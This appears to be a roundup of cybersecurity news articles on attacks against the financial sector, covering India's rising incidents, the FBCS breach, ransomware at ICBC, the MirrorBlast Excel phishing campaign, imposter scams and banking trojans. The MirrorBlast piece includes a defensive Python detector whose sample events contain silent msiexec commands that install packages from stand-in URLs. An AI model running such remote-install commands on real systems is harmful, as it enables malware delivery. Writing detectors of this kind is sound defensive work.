Cyberattacks Skyrocket in India, Are We Ready for the Digital Danger Ahead?


 

India is experiencing a rise in cyberattacks, particularly targeting its key sectors such as finance, government, manufacturing, and healthcare. This increase has prompted the Reserve Bank of India (RBI) to urge banks and financial institutions to strengthen their cybersecurity measures.

As India continues to digitise its infrastructure, it has become more vulnerable to cyberattacks. Earlier this year, hackers stole and leaked 7.5 million records from boAt, a leading Indian company that makes wireless audio and wearable devices. This is just one example of how cybercriminals are targeting Indian businesses and institutions.

The RBI has expressed concern about the growing risks in the financial sector due to rapid digitization. In 2023 alone, India’s national cybersecurity team, CERT-In, handled about 16 million cyber incidents, a massive increase from just 53,000 incidents in 2017. Most banks and non-banking financial companies (NBFCs) now see cybersecurity as a major challenge as they move towards digital technology. The RBI’s report highlights that the speed at which information and rumours can spread digitally could threaten financial stability. Cybercriminals are increasingly focusing on financial institutions rather than individual customers.

The public sector, including government agencies, has also seen a dramatic rise in cyberattacks. Many organisations report that these attacks have increased by at least 50%. Earlier this year, a hacking group targeted government agencies and energy companies using a type of malware known as HackBrowserData. Additionally, countries like Pakistan and China have been intensifying their cyberattacks on Indian organisations, with operations like the recent Cosmic Leopard campaign.

According to a report by Cloudflare, 83% of organisations in India experienced at least one cybersecurity incident in the last year, placing India among the top countries in Asia facing such threats. Globally, India is the fifth most breached nation, which underscores the need for stronger cybersecurity measures.

Indian companies are most worried about threats related to cloud computing, connected devices, and software vulnerabilities. The adoption of new technologies like artificial intelligence (AI) and cloud computing, combined with the shift to remote work, has accelerated digital transformation, but it also increases the need for stronger security measures.

Manu Dwivedi, a cybersecurity expert from PwC India, points out that AI-powered phishing and sophisticated social engineering techniques have made ransomware a top concern for organisations. As more companies use cloud services and open-source software, the risk of cyberattacks grows. Dwivedi also stresses the importance of protecting against insider threats, which requires a mix of strategy, culture, training, and governance.

AI is playing a growing role in both defending against and enabling cyberattacks. While AI has the potential to improve security, it also introduces new risks. Cybercriminals are beginning to use AI to create more advanced malware that can avoid detection. Dwivedi warns that as AI continues to evolve, it may become harder to track how these tools are being misused by attackers.

Partha Gopalakrishnan, founder of PG Advisors, emphasises the need for India to update its cybersecurity laws. The current law, the Information Technology Act of 2000, is outdated and does not fully address today’s digital threats. Gopalakrishnan also stressed the growing demand for AI skills in India, suggesting that businesses should focus on training in both AI and cybersecurity to close the skills gap. He warns that as AI becomes more accessible, it could empower a wider range of people to carry out sophisticated cyberattacks.

India’s digital growth presents great opportunities, but it also comes with serious challenges. It’s crucial for Indian businesses and government agencies to develop comprehensive cybersecurity strategies and stay vigilant.


FBCS Data Breach Affects 4.2 Million Americans


 


Financial Business and Consumer Solutions (FBCS), a debt collection agency, has announced that a data breach in February 2024 has now affected 4.2 million people in the U.S. This is a drastic rise from previous reports and underscores the growing impact of the breach.

Initially, in April, FBCS reported that 1.9 million individuals had their sensitive information compromised due to a breach on February 14, 2024. In May, this number was revised upward to 3.2 million. Recently, a new notice filed with the Office of the Maine Attorney General increased the total number of affected individuals to 4,253,394.

Types of Compromised Data

The breached information varies per person but includes highly sensitive data such as full names, Social Security Numbers (SSNs), birth dates, account information, and driver’s licence or ID card numbers. This level of data exposure poses serious risks of identity theft and fraud.

Company's Response and Notifications

Starting July 23, FBCS began notifying the additional people impacted by the breach. These notifications warn recipients about the increased risk of phishing and fraud attempts. The company is also offering free 24-month credit monitoring and identity restoration services through CyEx to help those affected.

Details of the Breach

FBCS discovered the breach on February 26, 2024, when it detected unauthorised access to specific systems within its internal network. Despite the severity of the incident, FBCS has not disclosed detailed information about the nature of the attack or identified any individuals or groups responsible for the breach. The company has stated that the unauthorised access was confined to its internal systems and did not extend to computer systems outside its network. So far, no ransomware gangs have claimed responsibility for the breach, leaving the exact methods and perpetrators of the attack unknown.

FBCS advises those affected to remain vigilant against phishing attempts designed to steal more personal information. It is also recommended that individuals closely monitor their credit reports for any signs of fraudulent activity or unauthorised loans, as the exposed information could be used for identity theft.

The FBCS data breach highlights vulnerabilities within the financial sector. As FBCS works to manage the repercussions, it is crucial for affected individuals to take protective measures to safeguard their personal information and mitigate potential risks.


Ransomware Shakes ICBC: Global Financial Markets on High Alert

In a startling turn of events, Wall Street was rocked by a devastating ransomware attack that affected the Industrial and Commercial Bank of China (ICBC), China's biggest lender. The attack disrupted trade and brought attention to the growing threat of cybercrime in the financial sector.

The attack, which targeted ICBC, was not only a significant blow to the bank but also had far-reaching implications on the global financial landscape. Wall Street, closely intertwined with international markets, experienced a temporary halt in trade as the news of the cyber assault reverberated across financial news outlets.

The ransomware attack on ICBC serves as a stark reminder of the vulnerability of even the most robust financial institutions to sophisticated cyber threats. The attackers, exploiting weaknesses in ICBC's cybersecurity infrastructure, managed to compromise critical systems, causing widespread disruptions and raising concerns about the broader implications for the global financial ecosystem.

As information about the attack unfolded, reports indicated that ICBC struggled to contain the breach promptly. The incident prompted regulatory bodies and financial institutions worldwide to reevaluate their cybersecurity measures, recognizing the urgent need for robust defenses against evolving cyber threats.

The consequences of such attacks extend beyond financial disruptions. They underscore the importance of collaborative efforts among nations and private enterprises to strengthen global cybersecurity frameworks. The interconnected nature of the modern financial system demands a united front against cyber threats, with a focus on information sharing, technological innovation, and proactive defense strategies.

In the aftermath of the ICBC attack, financial markets witnessed increased scrutiny from regulators, urging institutions to fortify their cybersecurity postures. This incident serves as a wake-up call for the industry, emphasizing the need for continuous investment in cybersecurity measures, employee training, and the adoption of cutting-edge technologies to stay ahead of evolving threats.

The broader implications of the ICBC ransomware attack are not limited to the financial sector alone. They underscore the need for a collective and proactive approach to cybersecurity across industries, as cyber threats continue to grow in scale and sophistication. As nations and businesses grapple with the aftermath of this attack, it becomes increasingly evident that cybersecurity is a shared responsibility that transcends borders and industries.

This New Phishing Attack Uses a Weaponized Excel File

 

A new phishing campaign is targeting financial sector employees by using links to download a ‘weaponized’ Excel document.

The campaign, named MirrorBlast, was discovered in early September by security firm ET Labs. Morphisec, a fellow security firm, has now studied the malware and warns that the malicious Excel files might escape malware-detection systems due to "extremely lightweight" embedded macros, making the campaign especially risky for businesses that rely on detection-based protection and sandboxing.

Macros, or scripts for automating activities, have grown in popularity among cybercriminals. Although macros are disabled by default in Excel, attackers employ social engineering to deceive potential victims into enabling them. Despite appearing to be a simple approach, macros have been employed by state-sponsored hackers because they frequently work.

Earlier this year, Microsoft extended its Antimalware Scan Interface (AMSI) for antivirus to combat the rise in macro malware and a recent trend among attackers of using outdated Excel 4.0 XLM macros (rather than newer VBA macros) to circumvent anti-malware systems.

As per Morphisec, the MirrorBlast attack chain is similar to tactics used by TA505, a well-established, financially focused Russia-based cybercriminal group. The group has been active since at least 2014 and is well-known for its usage of a wide range of tools. 

Morphisec researcher Arnold Osipov stated in a blog post, "TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution." 

While the MirrorBlast attack begins with a document attached to an email, it afterwards uses a Google feed proxy URL with a SharePoint and OneDrive trap that masquerades as a file-sharing request. When the user clicks the URL, they are sent to a hacked SharePoint site or a bogus OneDrive site. Both versions lead to the malicious Excel document.

The sample MirrorBlast email demonstrates how the attackers are capitalising on company-issued information about COVID-related changes to working conditions. Morphisec points out that due to compatibility issues with ActiveX components, the macro code can only be run on a 32-bit version of Office. The macro itself runs a JavaScript script meant to avoid sandboxing by determining if the computer is in administrator mode. The msiexec.exe process is then launched, which downloads and installs an MSI package.

Morphisec discovered two MSI installer variants that employed legitimate scripting tools named KiXtart and REBOL. The KiXtart script transmits information about the victim's workstation to the attacker's command and control server, including the domain, computer name, user name, and process list. The server then answers with a number indicating whether the Rebol version should be used. Morphisec states that the Rebol script leads to a remote access tool called FlawedGrace, which the group has previously utilised.

Osipov added, "TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals." 
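The msiexec.exe step in the chain described above is a practical detection point. As an added example (not code from Morphisec or the original post), the following Python triages process-creation events for msiexec.exe being handed a remote package URL and raises the severity when the parent is an Office application or a script host; the event field names, the parent list and the sample events are constructed assumptions.

```python
import ntpath
import re

# Assumption: parents that should rarely, if ever, start an MSI install.
SUSPICIOUS_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe"}
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)

def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    if ntpath.basename(event["image"]).lower() != "msiexec.exe":
        return None
    if not REMOTE_URL.search(event["cmdline"]):
        return None  # local package or service start: out of scope here
    parent = ntpath.basename(event["parent"]).lower()
    return "high" if parent in SUSPICIOUS_PARENTS else "medium"

def triage(events):
    """Return (index, severity) for every event that matched."""
    hits = []
    for i, event in enumerate(events):
        severity = classify(event)
        if severity:
            hits.append((i, severity))
    return hits

# Constructed sample events (field names are hypothetical, modelled on
# typical EDR / Sysmon process-creation telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": "msiexec.exe /i http://files.example.invalid/update.msi /qn"},
    {"parent": r"C:\Windows\SysWOW64\wscript.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": "msiexec /i https://cdn.example.invalid/a.msi /norestart /q"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i https://vendor.example.invalid/setup.msi"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\setup.msi"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /V"},
    {"parent": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\splwow64.exe",
     "cmdline": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for index, severity in triage(SAMPLE_EVENTS):
        print(severity, SAMPLE_EVENTS[index]["cmdline"])
```

The "medium" tier exists because some legitimate software deployment also installs from a URL; the parent process is what separates a user-driven install from one started by a document or script.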

The FBI and SEC Provided Guidance Against Imposter Scams

 

The FBI and SEC have issued new guidance for investors to fight financial scams. Investors are advised to reject and report fraud in order to protect their businesses and avoid paying money to an imposter.

Among various sectors, consumer markets have taken a major hit as stringent lockdowns have brought economic activity to a standstill. 

Nowadays, cyber-attackers are employing highly sophisticated tricks to carry out financial scams. According to the FBI's Criminal Investigative Division and the United States Securities and Exchange Commission, fraudsters pose as real brokers or investment advisers to trick users. Once they have gained a victim's trust, the fraudsters can trick investors into surrendering more information.

The FBI and the SEC said that cybercriminals are using very advanced techniques to appear legitimate, including fake social media profiles and fake websites that look identical to those of legitimate firms, and are hiding their actual locations.

In addition, cybercriminals have been falsifying legitimate documents, such as public reports carrying a real identity and Central Registration Depository (CRD) number but the names of unregistered firms. The fraudsters' messages reportedly contained poor grammar and spelling errors. Besides the FBI and the SEC, FINRA issued a similar warning last week.

"The doctored BrokerCheck report was emailed to potential “clients” using the name and CRD number of a registered investment professional—but with a company that is not registered as a broker-dealer with FINRA..." 

"...The solicitation included other documentation and a request for investors to respond with a photo of their driver’s license and other personal information...", the group wrote. 

Safety Measures

• According to the FBI and SEC recommendation, if someone claims that an investment is legitimate, users should research that person's name on Investor.gov and verify it thoroughly.

• Be aware of fake offers, such as high investment returns.

• Before going ahead with any firm, investors are advised to use FINRA's BrokerCheck to verify it.

• The FBI and SEC also highlighted that most licensed and registered investment organizations don't allow investors to use credit cards or cryptocurrencies to invest, so you are advised to think twice before making investments.

• At the time of payment, investors are advised not to send money directly without verifying the recipient. Also, one must not send personal data, including date of birth, driver's license number, or any other official documents.

Banking Trojans Rise as the Top Security Concern


According to new research by Blueliv, banking trojans have emerged as the biggest threat to the financial sector, followed by mobile malware. A Twitter poll of 11,000 users conducted by cyberthreat intelligence provider Blueliv revealed that a third of respondents were concerned about the impact banking Trojans (31 percent) and mobile malware (28 percent) will have on financial services organizations and their customers in 2020. Tracking these financial threats, Blueliv researchers observed a 283% increase in the Trickbot banking trojan and a 130% increase in Dridex botnets. These Q2 and Q3 botnets are believed to be distributing banking trojans and malware to financial sector organizations and their customers.


Skill shortage and lack of visibility of threats are security challenges

According to the Blueliv poll, the financial sector is suffering from a major skill shortage in building security programs and identifying security threats. The most pressing challenge is a shortage of skills (28 percent), followed by the high volume of threats and alerts (26 percent) and a lack of visibility into cyber threats (20 percent). Realwire quotes, "This is hardly surprising: as financial services institutions (FSIs) embrace digital processes and new customer interaction channels, so their attack surface grows, making it harder to keep on top of threats ranging from Point-of-Sale (PoS) to ATM malware, mobile apps malware to card skimmers."

Recent data from (ISC)2 shows that the global skills shortage has crossed 4 million. In Europe alone, the shortage has surpassed 100 percent. Daniel Solís, CEO and founder, Blueliv says, “Organizations in the financial sector face a constantly changing threat landscape. Business priorities have shifted and digital risk management is now central. Because they are such high-value targets for cybercriminal activity, it is imperative that financial services organizations monitor what is happening both inside and outside their networks in real-time to create effective mitigation strategies before, during and after an attack.”

He further commented, “FSI (financial services institutions) security teams can be easily overwhelmed by the number of threat alerts they receive which can very quickly result in alert fatigue and desensitization to real, preventable threats. Threat intelligence can address the cyber skills gap through continuous automated monitoring combined with the human resource to provide context, helping FSIs develop highly-targeted threat detection, prevention, and investigation capabilities.”

Financial organizations are prime targets for attacks. Even with the most sophisticated cyber defense strategies, weak spots remain and are being exploited by trojans and malware that fraud risk assessment teams overlook due to skills shortages and poor threat visibility.